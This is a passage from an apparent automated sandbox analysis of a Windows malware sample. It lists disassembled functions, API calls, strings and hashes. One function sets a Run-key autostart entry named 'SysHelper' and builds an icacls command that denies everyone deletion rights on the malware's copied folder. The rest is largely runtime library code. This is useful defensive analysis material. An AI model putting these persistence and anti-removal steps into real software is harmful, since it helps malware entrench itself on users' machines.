4721b2-4721b8 680->685 686 4721aa-4721b0 GetLastError 680->686 681->680 687 4721c0-4721cf WaitForSingleObject 685->687 686->671 687->671 687->687
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                            • _memset.LIBCMT ref: 00471D3B
                                                                                                                            • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                            • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00471E99
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00471EA5
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00471EB4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00471EBF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00471ECE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?), ref: 00471EDB
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00471EFC
                                                                                                                            • UuidToStringW.RPCRT4(?,?), ref: 00471F14
                                                                                                                            • RpcStringFreeW.RPCRT4(00000000), ref: 00471F64
                                                                                                                            • PathAppendW.SHLWAPI(?,?), ref: 00471F83
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00471F8E
                                                                                                                            • PathAppendW.SHLWAPI(?,?,?,?), ref: 0047202D
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00472036
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0047204C
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0047206E
                                                                                                                            • _memset.LIBCMT ref: 00472090
                                                                                                                            • lstrcpyW.KERNEL32(?,005602FC), ref: 004720AA
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 004720C0
                                                                                                                            • lstrcatW.KERNEL32(?," --AutoStart), ref: 004720CE
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004720D7
                                                                                                                            • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004720F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004720FC
                                                                                                                            • _memset.LIBCMT ref: 00472120
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00472146
                                                                                                                            • lstrcpyW.KERNEL32(?,icacls "), ref: 00472158
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0047216D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                            • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                            • API String ID: 2589766509-1182136429
                                                                                                                            • Opcode ID: c65a4599d94957638bf2337ed19a9afd74271cc3587a46c835a3097e16c613ea
                                                                                                                            • Instruction ID: 6fa5f262b01b05fbd2709d1527e0c51e15416143bd43534c892a36d535dda116
                                                                                                                            • Opcode Fuzzy Hash: c65a4599d94957638bf2337ed19a9afd74271cc3587a46c835a3097e16c613ea
                                                                                                                            • Instruction Fuzzy Hash: 6EE1AF71D00219ABDF24DBA0CD49FEFBBB8BF04304F1044AAE509A7191EB746A89CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 975 483576-48358f 976 4835a9-4835be call 48b420 975->976 977 483591-48359b call 485208 call 4842d2 975->977 976->977 983 4835c0-4835c3 976->983 984 4835a0 977->984 985 4835c5 983->985 986 4835d7-4835dd 983->986 989 4835a2-4835a8 984->989 990 4835cb-4835d5 call 485208 985->990 991 4835c7-4835c9 985->991 987 4835e9 call 48fb64 986->987 988 4835df 986->988 996 4835ee-4835fa call 48f803 987->996 988->990 993 4835e1-4835e7 988->993 990->984 991->986 991->990 993->987 993->990 999 483600-48360c call 48f82d 996->999 1000 4837e5-4837ef call 4842fd 996->1000 999->1000 1005 483612-48361e call 48f857 999->1005 1005->1000 1008 483624-48362b 1005->1008 1009 48369b-4836a6 call 48f939 1008->1009 1010 48362d 1008->1010 1009->989 1016 4836ac-4836af 1009->1016 1011 48362f-483635 1010->1011 1012 483637-483653 call 48f939 1010->1012 1011->1009 1011->1012 1012->989 1020 483659-48365c 1012->1020 1018 4836de-4836eb 1016->1018 1019 4836b1-4836ba call 48fbb4 1016->1019 1022 4836ed-4836fc call 4905a0 1018->1022 1019->1018 1028 4836bc-4836dc 1019->1028 1023 48379e-4837a0 1020->1023 1024 483662-48366b call 48fbb4 1020->1024 1031 483709-483730 call 4904f0 call 4905a0 1022->1031 1032 4836fe-483706 1022->1032 1023->989 1024->1023 1033 483671-483689 call 48f939 1024->1033 1028->1022 1041 48373e-483765 call 4904f0 call 4905a0 1031->1041 1042 483732-48373b 1031->1042 1032->1031 1033->989 1038 48368f-483696 1033->1038 1038->1023 1047 483773-483782 call 4904f0 1041->1047 1048 483767-483770 1041->1048 1042->1041 1051 4837af-4837c8 1047->1051 1052 483784 1047->1052 1048->1047 1053 4837ca-4837e3 1051->1053 1054 48379b 1051->1054 1055 48378a-483798 1052->1055 1056 483786-483788 1052->1056 1053->1023 1054->1023 1055->1054 1056->1055 1057 4837a5-4837a7 1056->1057 1057->1023 1058 4837a9 1057->1058 1058->1051 1059 4837ab-4837ad 1058->1059 1059->1023 1059->1051
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004835B1
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048364A
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00483680
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048369D
                                                                                                                            • __allrem.LIBCMT ref: 004836F3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048370F
                                                                                                                            • __allrem.LIBCMT ref: 00483726
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483744
                                                                                                                            • __allrem.LIBCMT ref: 0048375B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503770280-0
                                                                                                                            • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                            • Instruction ID: 40638daca53146679ffc2dc0bce7f7d1be40b88f96f6423534919253ec6f780a
                                                                                                                            • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                            • Instruction Fuzzy Hash: 2A71EBF1A00716BBD714BE6ACC41B5E73A4AF00B29F144A3BF914D6781E778EA408798
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00487B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1060 487b0b-487b1a call 487ad7 ExitProcess
                                                                                                                            APIs
                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 00487B11
                                                                                                                              • Part of subcall function 00487AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;H,00487B16,i;H,?,00488BCA,000000FF,0000001E,00567BD0,00000008,00488B0E,i;H,i;H), ref: 00487AE6
                                                                                                                              • Part of subcall function 00487AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00487AF8
                                                                                                                            • ExitProcess.KERNEL32 ref: 00487B1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                            • String ID: i;H
                                                                                                                            • API String ID: 2427264223-4243722023
                                                                                                                            • Opcode ID: 064c6db91c207f9404f7a77c6c6b2f2c8549851e5ea9403b35a344e00f98703b
                                                                                                                            • Instruction ID: fa7413996304f0347a65eb69a8b915408f0931ee0ea5a9b8ae6a68151094643b
                                                                                                                            • Opcode Fuzzy Hash: 064c6db91c207f9404f7a77c6c6b2f2c8549851e5ea9403b35a344e00f98703b
                                                                                                                            • Instruction Fuzzy Hash: 74B09230004108BBCB093F52DC0A85D3F2AEF01390F108025F90408032EFB2AA92AAC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483B4C Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1063 483b4c-483b52 1064 483b61-483b64 call 480c62 1063->1064 1066 483b69-483b6c 1064->1066 1067 483b6e-483b71 1066->1067 1068 483b54-483b5f call 48793d 1066->1068 1068->1064 1071 483b72-483bb2 call 490d21 call 490eca call 490d91 1068->1071 1078 483bbb-483bbf 1071->1078 1079 483bb4-483bba call 482587 1071->1079 1079->1078
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00483B64
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • std::exception::exception.LIBCMT ref: 00483B82
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00483B97
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3074076210-0
                                                                                                                            • Opcode ID: f9eaa0569d657ce334be9c764f735e900f845af0900ed5eafb523da47c1fffe7
                                                                                                                            • Instruction ID: 76720e5e7bc344fa612d069b29f5312166549de4e4287ed31daf6cda5f065efc
                                                                                                                            • Opcode Fuzzy Hash: f9eaa0569d657ce334be9c764f735e900f845af0900ed5eafb523da47c1fffe7
                                                                                                                            • Instruction Fuzzy Hash: 70F0F47140421D66CF00BE99EC56DDE7BECEF01719F10497BFC1492282DBB4AA4483D8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00473A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1082 473a90-473ab0 1083 473ab2-473ab8 1082->1083 1084 473af8-473afd 1082->1084 1085 473b00-473b05 call 4af23e 1083->1085 1086 473aba-473ac2 call 483b4c 1083->1086 1090 473b0a-473b0f call 4af1bb 1085->1090 1089 473ac7-473ace 1086->1089 1089->1090 1091 473ad0-473ae0 1089->1091 1093 473af4-473af7 1091->1093 1094 473ae2-473af1 1091->1094 1093->1084 1094->1093
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00473B0A
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 657562460-3788999226
                                                                                                                            • Opcode ID: 01d7777c9b1f260816118f8f99f74ac6320ceb86f0ba665e23d29e08b595a7ce
                                                                                                                            • Instruction ID: 5d6567c30f29685bd09b39b46f0a31aa6306a4d5c427e75f1a4f94106cc3b954
                                                                                                                            • Opcode Fuzzy Hash: 01d7777c9b1f260816118f8f99f74ac6320ceb86f0ba665e23d29e08b595a7ce
                                                                                                                            • Instruction Fuzzy Hash: A801F172100706ABD720CF9CC091687F7E8AF80725F20893FEA5983341EBB5E944C784
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0048FB64 Relevance: 3.0, APIs: 2, Instructions: 17COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1096 48fb64-48fb77 call 488520 1099 48fb79-48fb8c call 488af7 1096->1099 1100 48fba5-48fbaa call 488565 1096->1100 1105 48fb99-48fba0 call 48fbab 1099->1105 1106 48fb8e call 48fe47 1099->1106 1105->1100 1109 48fb93 1106->1109 1109->1105
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048FB7B
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(i;H,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • __tzset_nolock.LIBCMT ref: 0048FB8E
                                                                                                                              • Part of subcall function 0048FE47: __lock.LIBCMT ref: 0048FE6C
                                                                                                                              • Part of subcall function 0048FE47: ____lc_codepage_func.LIBCMT ref: 0048FEB3
                                                                                                                              • Part of subcall function 0048FE47: __getenv_helper_nolock.LIBCMT ref: 0048FED4
                                                                                                                              • Part of subcall function 0048FE47: _free.LIBCMT ref: 0048FF07
                                                                                                                              • Part of subcall function 0048FE47: _strlen.LIBCMT ref: 0048FF0E
                                                                                                                              • Part of subcall function 0048FE47: __malloc_crt.LIBCMT ref: 0048FF15
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1282695788-0
                                                                                                                            • Opcode ID: 96d6c869f0af39883e35fb05bbd5a31938bcaed80bf37bd34b4e6be2b34af4ea
                                                                                                                            • Instruction ID: 765a56c5f03115d4445ba7584c69f2dcc45a2302bb122a8e22139a8ae99c39fb
                                                                                                                            • Opcode Fuzzy Hash: 96d6c869f0af39883e35fb05bbd5a31938bcaed80bf37bd34b4e6be2b34af4ea
                                                                                                                            • Instruction Fuzzy Hash: 97E0E634551644DAD720BBB6E91A71C7160AB10329F50991FD414111D24FBC15CCEB2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047CC50 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1110 47cc50-47cc62 call 483b4c 1113 47cc64-47cc69 1110->1113 1114 47cc83-47cc88 call 4af1bb 1110->1114 1115 47cc71 1113->1115 1116 47cc6b-47cc6f 1113->1116 1118 47cc74-47cc7b 1115->1118 1116->1118 1120 47cc7f-47cc80 1118->1120 1121 47cc7d 1118->1121 1121->1120
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0047CC83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 657562460-0
                                                                                                                            • Opcode ID: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                            • Instruction ID: d35ec99b10942a5e784a732dd5713af3144c4dc4f3d765172cccd57d252ada6f
                                                                                                                            • Opcode Fuzzy Hash: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                            • Instruction Fuzzy Hash: F6E04F757402049FDB09EE52C491ABB77999BA2740B14C02EAC0E8B751EA34D90597A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00487F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1122 487f3d-487f47 call 487e0e 1124 487f4c-487f50 1122->1124
                                                                                                                            APIs
                                                                                                                            • _doexit.LIBCMT ref: 00487F47
                                                                                                                              • Part of subcall function 00487E0E: __lock.LIBCMT ref: 00487E1C
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(00567B08,0000001C,00487CFB,00483B69,00000001,00000000,i;H,00487C49,000000FF,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E5B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E6C
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E85
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(-00000004,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E95
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E9B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487EB1
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487EBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2158581194-0
                                                                                                                            • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction ID: cd31fe6ccee1c9104b14018fc3f0cb71c832b62b837260db633732b656dada53
                                                                                                                            • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction Fuzzy Hash: B8B0927198420832DA113642AC03B193A085740A54F200061BA0C185A1A592A96041C9
